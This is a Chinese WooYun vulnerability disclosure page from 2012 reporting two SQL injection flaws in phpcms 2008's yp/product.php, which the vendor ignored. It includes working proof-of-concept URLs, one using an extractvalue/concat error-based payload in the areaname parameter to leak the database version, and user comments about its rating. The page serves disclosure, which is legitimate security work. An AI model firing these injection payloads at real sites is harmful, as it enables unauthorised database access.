当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-06850

漏洞标题:phpcms 2008 SQL注射漏洞2枚

相关厂商:phpcms

漏洞作者: c4rp3nt3r

提交时间:2012-05-09 11:41

修复时间:2012-05-14 11:41

公开时间:2012-05-14 11:41

漏洞类型:SQL注射漏洞

危害等级:低

自评Rank:2

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2012-05-09: 细节已通知厂商并且等待厂商处理中
2012-05-14: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

phpcms 2008某模块,参数缺少过滤存在SQL注射漏洞2个.也没什么危害1个1rank不多吧?

详细说明:

跟这个存在的位置差不多好像,当时找的.
WooYun: phpcms 2008代码注射漏洞

http://bt/phpcms2008/phpcms/yp/product.php?catid=1&areaname=555%27%20and%20extractvalue%281,concat%280x09,%28version%28%29%29%29%29%20and%20%271%27=%271


http://127.0.0.1/v/phpcms/yp/product.php?prowhere=1%27

漏洞证明:

修复方案:

版权声明:转载请注明来源 c4rp3nt3r@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2012-05-14 11:41

厂商回复:

漏洞Rank:8 (WooYun评价)

最新状态:

暂无


漏洞评价:

评论

  1. 2012-05-09 12:09 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    洞主太谦虚了

  2. 2012-05-09 12:11 | c4rp3nt3r ( 实习白帽子 | Rank:70 漏洞数:10 | 人生的意义就在于从一个圈子跳到另一个更大...)

    @xsser 大牛俺哪里谦虚了

  3. 2012-05-09 12:27 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    2 分..

  4. 2012-05-09 12:56 | c4rp3nt3r ( 实习白帽子 | Rank:70 漏洞数:10 | 人生的意义就在于从一个圈子跳到另一个更大...)

    @xsser 就值这个价啊

  5. 2012-05-14 11:44 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    利用xpath爆错

  6. 2012-05-23 10:20 | Php0day ( 路人 | Rank:1 漏洞数:1 | php安全开发、代码审计、渗透测试。)

    各种洞

  7. 2012-11-22 02:05 | Seay ( 实习白帽子 | Rank:65 漏洞数:8 )

    危害等级:无影响厂商忽略